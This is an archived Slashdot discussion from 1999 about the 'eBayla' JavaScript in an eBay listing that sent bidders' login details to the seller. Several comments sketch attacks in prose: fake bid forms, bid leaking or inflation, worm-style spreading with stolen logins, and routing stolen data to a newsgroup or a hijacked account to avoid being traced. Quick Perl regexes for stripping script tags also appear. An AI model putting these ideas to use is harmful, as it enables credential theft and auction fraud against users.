Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 


Forgot your password?
Close
typodupeerror
×
Bug

The eBayla Virus 81

Posted by CmdrTaco from the now-/that/-is-scary dept.
An anonymous reader linked us a Tasty Bit from Tasty Bits about the eBayla virus: an auction item that contains some Java Script that will email your private eBay info to the creator of the auction. Eek.
This discussion has been archived. No new comments can be posted.

The eBayla Virus More

The eBayla Virus

Comments Filter:

  • How does it reproduce? (Score:1)

    by Anonymous Coward
    If its a virus, shouldnt it copy itself to other auction items? Does this one do that? I understand that its definitely possible to do what this guy did, but is it possible to make a real virus out of JS? Not that I'd want to, just curious ;-)

  • Increasing bid amounts (Score:1)

    by Anonymous Coward
    The really bad thing is that this javascript is displayed on the same page that the user enters their bid amount. It really wouldn't be to hard for someone to write javascript that:

    1) increases the amount bid before the form is submitted.

    2) just tells someone else what the proxy limit is. (Imagine, you submit your bid, and cracker_foobar is right up there, bidding one dollar below your limit. Gee, someone seems to know a lot about what I'm willing to pay.) You could get away with this scam for ages. I wonder who is already doing this...

  • Increasing bid amounts (Score:1)

    by Anonymous Coward
    > ...I wonder who is already doing this...

    It's not too hard to find out. Just do an eBay search of item descriptions for javascript and examine any item that doesn't seem to have anything to do with web design. I just tried this and of the 143 matches, several items were mysteriously cancelled by eBay, but there was one very recently added item that included the ebayla code.

    eBay is gonna have to fix this quick or get in the habit of manually checking all of their auctions for dodgy javascript, but for a web company worth billions they sure don't seem to invest much of it in web design expertise.

  • And they're threatening the guy? (Score:2)

    by Anonymous Coward

    eBay is being ridiculous (also pigheaded and stupid and arrogant and other such things), threatening the guy who found the hole for them. When that sort of thing happens you fall on your feet fixing it, and then you (discreetly) fall on your feet thanking who found it.



    If they were to take action against the finder (presumably to protect their own asses), they might find what it's like to get the derision of the broadly-variable security reseach field; that ranges from negative mention in papers few people read to script-kiddie holocaust.



    Annoying too that the media's calling this a "virus," which it isn't, not even close.


  • Well designed pages work quite well without the Javascript as well. Try accessing pages with and without Javascript and I think you'll find that the value they add isn't as great as it appears initally.

    Maybe you can point to a page that uses Javascript effectivly to enhance the experiance. I'd like to see what you consider "making the page better for you".

  • Re: Javascript (Score:3)

    by jandrese ( 485 ) <kensama@vt.edu> on Thursday April 22, 1999 @03:30PM (#1920555) Homepage Journal
    &gt;RANT&lt; As a web user I find Javascript generally useless and slow.

    It seems to me that 50% of the Javascript on the web is used to hilite a link when you move your cursor over it, which I think is absolutely useless. My cursor already changes when I move it over a link, and loading a button twice just to have it reinforce the cursor change is not how I want to spend my time.

    Another 40% of the Javascript code out there opens annoying, useless "consoles" that take valuble screen space and rarely have any sort of meat to them.

    The last 10% is a mixed bag consisting of opening up a homepage to a site when you leave the site (Really really irritating ones force you to kill the browser to get off the site); making forms more "interactive", where the most frequent offender is the pulldown menu that automatically jumps to whatever you select, nevermind if you get it wrong or don't have Javascript. Frequently these pages omit the "submit" button as well, irritating Lynx users to no end.

    As if this isn't bad enough, Javascript is not exactly a solid standard, with Netscape and Microsoft implementing their own set of bugs and incompatibilities into each version of their browsers. "But this works on my machine at home and in the lab!".

    In conclusion: Javascript does not add enough value to my web surfing experiance to counterbalance all of the negative issues associated with it. &gt;/RANT&lt;
  • Posted by labisso:

    It's always been my personal opinion that Ebay and windows are alot alike-- hundreds of fun-filled security holes and error messages wrapped up in a nice GUI.

    But maybe that's just me.

    "He was dead when i got there, i swear!"
  • Posted by My_Favorite_Anonymous_Coward:

    I bet to differ...

    In my case, http://members.tripod.com/mystop


    I make 20-30 forms with javacript in less than 9k of code. If you do it with those tags you will probably trible the size. I know it's just 27k, but it DOES make webpage a lot faster, especially with huge tables. (And yes, a huge table make more sense and faster than click click, when you want to check some company's inventory.)

    (Some of the forms don't work, I'm too lazy.)

    CY
  • Posted by My_Favorite_Anonymous_Coward:

    Hi,

    I havn't check the original "trojan", but I kind of get the idea of it. However, I remember that I could use absolute positioning in ebay. (but I didn't use "top:0; left:0" So I'm not sure if you can cover the top!)

    Make a fake bidding form is quite easy, simply send the form to your server side and redirect the user back to the actual confirmation page. And then you use or at the end to dump the real submit form. (even if you can't dump the real submit form, some bidder will still stupid enough to submit the upper form!!)


    CY
  • Posted by My_Favorite_Anonymous_Coward:

    Hi,

    I havn't check the original "trojan", but I kind of get the idea of it. However, I remember that I could use absolute positioning in ebay. (but I didn't use "top:0; left:0" So I'm not sure if you can cover the top!)

    Make a fake bidding form is quite easy, simply send the form to your server side and redirect the user back to the actual confirmation page. And then you use "commemt" or "table" tag at the end to dump the real submit form. (even if you can't dump the real submit form, some bidder will still stupid enough to submit the upper form!!)


    CY

  • WebTV (Score:1)

    by gavinhall ( 33 )
    Posted by Condescending Unix User:

    What about the poor bastards using WebTV. Does the WebTV browser support javascript fully enough to be vulnerable to this? And if so, can they disable javascript in their WebTV units?

  • I only allow the banks I use online (IE, they have my money) to use javascript or use cookies. I wish they didn't require javascript though so that I could use lynx which is prefered.

    Everyone else, you don't need javascript. (I'll allow java if I'm in netscape which I'm not, only because java is designed for security) I allow a few sites like /. a cookie, but unless you accually do something that needs a cookie you don't get one. (Yes I know cookies are relativly secure)

  • Post all info to a news group, so that you can't get fingered by "hmmmmm, all this information seems to be being sent to joe.stupid@unlucky.isp.com"

    Or just have it send to the address of someone you don't like, who's email account you have managed to break into.

  • The demo isn't properly a virus, but it is possible (but difficult) to make it one. It is not inconcievable to have a script look at any auctions the user may have, and change the description to include the virus code. To me, that would make it a true virus.

  • This goes back to making the web accessiable.
    Javascript is not a guarentee by the end user
    (whether he has turned it off, or is using
    a browser without it).

    Mind you, JavaScript can be used nicely
    to enhance a page, but requiring people to
    use Javascript to navigate your pages is
    a *Bad* thing.

    Plus, with all the different implementations out
    there (notice that some browsers have to fake
    their identity to get JS to work right), and
    with the potental security loopholes out there,
    JavaScript is just not a good thing right now.
    It can be if the browser makers buckled down
    and secured it, but I don't see that happening
    for a while.

    Moral is is to use JavaScript as additional
    flavor to a page, but not as a requirement
    to use it.
  • &amp;lt; shows up as &lt;. Similarly with &amp;gt; (&gt;). It's the browser that's ignoring the tags, not Slashdot's fault.
  • I'd class this as a trojan since it opens your data up to the outside.

    If you want to make it a virus, perhaps a two part virus, have it or the other part(back home) scan ebay for items for sale(modifiable pages) owned by the person who's ID you just stole. If they have any such pages, log in and modify them to include the viral code.

    Then try to log in to their isp, a few good guesses based on their personal data and I bet more than half have matching passwords. See if they have any home pages, edit them to include the viral code...
  • In its present form, you're right, it's just a trojan horse. However, if you actually read the page linked to above, you'd see that the possibility exists for this to be transformed into a virus.

    Say I run the trojan on my auction. It steals your password. I've programmed it to create more auctions, supposedly by you, that also steal your password and send it to me...It spreads for every person that bids. Wouldn't it be a virus then?

    My $.02
  • It's not just viewing an auction. This requires the user to place a bid on the auction (which requires entering the username & password), so it only affects a few people.


    -mike kania
  • eBayla looks a lot like eBay LA (or eBayLA), which is the name of eBay's upcoming Los Angeles-area listing directory. "eBayla virus" is a little too cute to be anything but a nickname.

    I always regard it as a goof-up when I find I've left my JavaScript turned on in Netscape for no particular reason...
  • JavaScript was originally called "liveScript". "liveConnect" is something else... I think it's the think that lets Java and JavaScript (and possibly some other things) talk to eachother. One use for it is so Java applets can access cookies. (JavaScript can access cookies, but Java applets cannot. But if a Java applet can communicate with JavaScript on a page...)
  • Well, I'd like to think that *my* site makes good use of Javascript. When you enter the site, you get a small popup window. The window lists all the other people also viewing the page. If you click on their names, you can instant message them. Is that useless? I don't think so.
  • I've got one that I've been meaning to find the time to try that relies not on Javascript, but on user stupidity... I'm sure there are plenty more.

    In any case, I rarely have Javascript enabled (I've yet to see any use for it that makes it worthwhile, and plenty that make it a nuisance) and can't possibly imagine why an auction item would require Javascript to describe it.

    The obvious solution to eBayla is to disallow Javascript in auction descriptions -- unfortunately I think the folks at eBay are too busy counting their money to actually do something to make the system better.

  • I think the name has little do to with what kind of code it is (virus vs. Trojan) and more with the soundbite-ness of it.

    Ebola virus = eBayla virus, etc.

    I know I'm being pedantic, but a lot of people are griping about the inaccuracy...

    Jay (=
  • This is a slightly better version that was mentioned on BUGTRAQ earlier today:

    http://www.news.com/News/Item/0,4,353 21,00.html [news.com]

    The summary about eBay's response:

    eBay acknowledged that the JavaScript exploit works, but minimized its importance.

    "We know it's there, but you have to put it all in perspective," said eBay spokesman Kevin Pursglove. "We have a very open environment that lets individuals describe what they're selling, and JavaScript is there so people can make the best of their abilities to describe an item."

    -- Bryan Feir

  • JavaScript is safe, except when idiots like eBay make it unsafe.

    Run that by me once again: If I connect to eBay they somehow replace my browser's "safe" Javascript engine with an "unsafe" one?

    If a technology can be (ab)used for "unsafe" purposes, it is by extension unsafe. Computer security at whatever level cannot be based on the assumption that everybody will use technology in a safe manner, and not try to do nasty things to you.

    (It's a bit like the CERT/CC stuff in the late 80s/early 90s: Largely only Sun actually admitted their holes and bugs to them. Did that mean other Unix vendors had bug- and hole-free implementations? No, they just didn't want the "exposure". This meant that hackers knew the holes (like Ultrix' "finger @@"), while administrators not necessarily learnt of it.)

    It's a good thing such things get out - what would eBay have said if the whole mess was discovered at a much later date, and a bunch of people sued them instead?

  • I've been setting up an auction website myself, and the easy way around this is simply limiting the allowed HTML, much the same way slashdot posts do :).... Letting them use , etc, is usually not a problem, but letting go by?

    Really f***ing ignorant, ebay :). What I can't understand is that eBay even strips the quotation marks. Ah, well....
    -Rahga
    yet another perl + CGI + html guy
  • $itemdescription =~ s/*script|/
    I said it was quick :)
  • $itemdescription =~ s/|//gi

    g for all occourances
    i for ignore case, as in""
    on the first i forgot the "... the >'s is also necessary (think "I've got a script!!!
    ....")
  • $itemdescription =~ s/(less than)*script*(greater than)|(less than)\/*script*(greater than)//gi

  • And is there any "slashdota virus"? No, I don't think so ;)
  • I think the problem is not going to be with eBay. The major problems will be with sites like ubid.com, and onsale.com. Both places require you to enter in actual credit card information before you can bid. If someone was to exploit that, they could mess things up a lot.
  • I followed the link(s) about this, and from what i can discern, this guy just wrote a Javascript that prompted people for their password info.
    The point is that the victim has to be STUPID enough to enter their password.
    This is a classic case of a "social" or "psychological" hack. It does not rely on the cunning or skill of the programmer, it relies on the gullibility of the victim.
  • It would appear that this can be a virus in that it can alter all of my auctions after I bid on an infected item, infecting them in turn. It can then propagate itself this way indefinitely (or until every single auction is infected :-)

    Jason Dufair
    "Those who know don't have the words to tell
  • I think this is a hoax. It would be unlikely that anyone could get your username and PW when you look at their auction, because that information is not stored on your hard drive. The cookie that eBay sends you when you sign in might be on your HD, but a cookie wouldn't contain that info, just a unique identifier (anyone want to check this?)

    What about people who are not members? You don't have to be an eBay member to view an auction, and even if you are a member, you don't have you sign in unless you are placing a bid.

    Am I missing something? This just doesn't add up. I think we've been the victims of another virus hoax.

    - CokeBear
    ------------------------------
    "It is wrong always, everywhere and for everyone to believe anything upon insufficient evidence."
    W. K. Clifford, "The Ethics of Belief" p. 282
  • I seem to remember a court rule recently that declared personal information has intrinsic value... If someone uses an "EBayla" script, would that person (or EBay) be sue-able?

    Ick.
  • This is a serious problem eBay has to deal with..

    But wouldn' it be funny if this guy logged on to eBay and offered this javascript for sale? Include a snippet of code, with the guarantee that the script isn't active, and sell to the highest bidder?

    eBay would really have to get their butts in gear quick!

    I hope he doesn't have to suffer for his service to humanity.

    AS

  • Am I missing something?

    The way it works is that when you type in your username/passwd in order to make the bid, the JScript sends that to the originator and passes the bid info on to eBay. So, it's more like a Trojan.

    To turn this into a real virus, take the username/passwd combos you have collected, use them to log in and modify that user's auction pages to include the JScript, and it starts to spread...Do it automatically, and there's a problem. How long before that?


    Mike
    --

  • I called this trojans.. They dont self replicate, just creat back doors and can delete files and ect.

    Yes JScript could be used to make a virus, cept I think it would take alot of work and alot of code. It would be interesting to see if someone is developement in one, the code would be outragious.
    "The pen is mighter than the sword... But what if you can't write?"
  • But... What's important is what you don't see. Working on webpages, I view source. A lot. And most of the JavaScript I see, like most of the best software in any case, is transparent. It's doing stuff so pages look better for you. Just like any good piece of software. Go to Hotwired [wired.com] for another article about this Ebay thingy. One person comments that he can't believe Ebay allows Javascript in people's auction descriptions, which I have to say is a pretty salient point. I think Ebay should not only ban javascript, but all browser-specific HTML. Just think: Ebay could force all auctioneers to submit to HTML 4.0 standards, creating a new breed of >technically good web authors. (I use the term technically because AFAIK, HTML 4 doesn't standardize taste, thereby preventing nausea-inducing color combinations.)

  • If you disable JavaScript, you are diabling a lot more than pop-up windows (we all know what sites use those the most).

    As a web developer, I like JavaScript becuase it makes my life a lot easier.

    People who somehow think cookies and JavaScript can get your credit card number and steal your girlfriend just don't get it. JavaScript is safe, except when idiots like eBay make it unsafe. Their press relase just underlines that they don't get it either.
  • Well, at least till EBay fixes it, all people have to do is disable javascript. I know I've been doing that for awhile. So those... Informational pop-up windows won't open when I close a page. Yeah, informational. -j
  • but its got a really cool name!
  • As a web user I find Javascript generally useless and slow.

    Yes! I turned javascript off and noticed a minimum order of magnitude speed increase. Plus, I got a nice side benefit... geo* type sites are bearable again to view. I don't really miss it.

    Additionally, a good website will make allowances to those stuck with "less-capable" (older) browsers. If I'm stuck with a link that's a "click-through" or a "pick your site", it's all a nice View Source away.

    Only problems are that Netscape doesn't support Cascading Style Sheets with javascript off, oddly, and that the "Break out of these frames" link sometimes works (from people who can't seem to realize that off site links should break out of the frames itself).

  • "JavaScript, which is unrelated to Sun Microsystems' Java programming language...."

    Kudos to news.com for including that. I run into way too many people who confuse Javascript with Java.

    The name "Javascript" was coined as a marketing tool to allow a scripting language (originally "liveconnect"?) to ride on the coattails of the Java programming language. Unfortunately, IMHO, the association has harmed the Java programming language.
  • Well even the links state it's not a virus, but it is a good soundbite for the news.

    I'm not sure which link you followed, but the one I followed explained quite clearly that just the simple matter of placing a bid on an auction (which requires your Ebay user name and password) would e-mail that same information to the person who had placed the script in the auction - with no warning to you. No special screens you wouldn't normall see on Ebay, no social engineering work required and no extra time taken.

    Nothing to warn you that something other than an ordinary auction bid has just taken place.

    If you are familiar with the way Ebay works this is easy to follow.
  • If (as it appears) he simply exploited it before pointing it out and giving them a chance to fix it, he's cracker scum and deserves to lose

    It certainly doesn't appear that way to me... but then I read the article...

    Ever hear of the phrase "shoot the messenger" - this is exactly what ebay is doing...
  • I've had correspondance with eBay over the past few days about this. I've tried out blue_adept's code, and it does work. I even e-mailed a little chunk of perl to eBay support with a description of the problem and a solution that could be easily implemented.

    Initially I got back a very misinformed response recommending that I change my password. I finally (3 emails later) got them to understnad what I was talking about, and they claim that they are working on a JS filter and will have the status posted to:

    http://www2.ebay.com/aw/announce.shtml [ebay.com]

    I also cautioned them against prosecuting blue_adept, since that wouldn't be very good for them in a PR sense...

    Hopefully they listen.

  • Post all info to a news group, so that you can't get fingered by "hmmmmm, all this information seems to be being sent to joe.stupid@unlucky.isp.com"
  • eBay says they won't hold people accountable for bids entered with a pilfered password.

    How do they intend to determine whether the bid was entered legitimately?

    Seems like a wide open excuse for someone who does want to back out "Wasn't me who entered that bid. Must be that eBayla 'virus.'"

    Dumb decision on eBay's part. If they decide not to allow JavaScript they won't PO that many customers, but the press over this virus sure will.
  • When people started to demand security back in the late 80th, early 90th, the main thread for your computer were destructive viruses. Today's hostile code focusses on being intrusive (however, ebayla's information can easily be used for destructive purposes).

    Bottom Line: This is just the beginning! I am sure we'll see much more code like this in the near future. No straightforward fix in sight! So better know the tools you are using!

  • eBay needs to be taken out and beaten severely for not taking this threat seriously. The potential for serious exploitation is huge, and I can't believe they're taking the stand that this is a minor challenge that won't affect most people.

    Amongst the "cute" ideas I've read about below (that all seem immediately technically and socially possible):

    - Virus idea. Take each login/pw pair and introduce new JavaScript bids that spread further.

    - Redirection. No reason you can't take someone away from eBay, put up a "duplicate" site that requests credit-card info. Very few users regularly check their current address or security information, especially with a "well-known" site like eBay.

    - Bid stealing. Immediately send information about bids to a third-party, which can be used to drive up the price to the maximum any user is willing to bid.

    - Bid modification. Change all bids and triple the submitted price. With eBay's anal standards about bid-retrieval, this could be a major hassle.

    Sheer stupidity. Whoever is in charge of their public relations/technical departments REALLY dropped the ball today (and whenever they decided that JavaScript was somehow necessary and acceptable in auction descriptions).
  • eBay needs to be taken out and beaten severely for not taking this threat seriously. The potential for serious exploitation is huge, and I can't believe they're taking the stand that this is a minor challenge that won't affect most people.



    Amongst the "cute" ideas I've read about below (that all seem immediately technically and socially possible):



    - Virus idea. Take each login/pw pair and introduce new JavaScript bids that spread further.



    - Redirection. No reason you can't take someone away from eBay, put up a "duplicate" site that requests credit-card info. Very few users regularly check their current address or security information, especially with a "well-known" site like eBay.



    - Bid stealing. Immediately send information about bids to a third-party, which can be used to drive up the price to the maximum any user is willing to bid.



    - Bid modification. Change all bids and triple the submitted price. With eBay's anal standards about bid-retrieval, this could be a major hassle.



    Sheer stupidity. Whoever is in charge of their public relations/technical departments REALLY dropped the ball today (and whenever they decided that JavaScript was somehow necessary and acceptable in auction descriptions).
  • I'm not suprised by eBay's reaction. It seems to me that most major corporations are in denial when it comes to security holes in thier products.

    I guess it just means they have to spend money to fix it that they could otherwise channel to thier already swollen profits.
  • I'm surprised that they are allowed to use "Java" in the name of it. Wouldn't that be some kind of trademart infringement?
  • Hi, this is blue_adept, the
    creator of the ebayla bug. I noticed
    that the only link mentioned in the article
    is to http://tbtf.com. That site updates itself daily... a static source of information on the bug is http://www.because-we-can.com
  • Hey AC- you have what version Netscape? I'm running "Communicator 4.06" and I KNOW I can turn off Javascript- it's definitely OFF. There are a few sites that crash my Netscape (it just shuts down very abruptly) with Javascript on. It's a total waste of time anyway.


  • I totally agree with the above AC comments- JavaScript is crap. If you, as a web developer, can't figure out how to do a useful, efficient page without it, the McDonald's near me needs you.

    Forget all the arguing- the very existance of a JavaScript virus that can cause ANY kind of damage or problem, PROVES that JavaScript is NOT secure, and is useless crap anyway.

    I've NEVER seen a need or reason to use it.

    You probably love those infernal, stupid, waste of 'net bandwidth background images that just make reading a major eyesore. I hope people start suing web developers who use busy background images for carpal tunnel retina.

    I bet you also use lots of equally stupid moving gifs. Whoever invented them should be put in stocks until 2030.

    I keep images off, Java off, and JavaScript off, and I'm a much happier surfer. :)


  • NT (Score:1)

    by bobby ( 109046 )
    Are you suggesting their web staff might be technologically impaired? Like maybe morons or something? So far, in my experience, I see a 1:1 correspondence between a serious lack of technical brainpower and choosing NT.

Slashdot Top Deals

Math is like love -- a simple idea but it can get complicated. -- R. Drabek

Close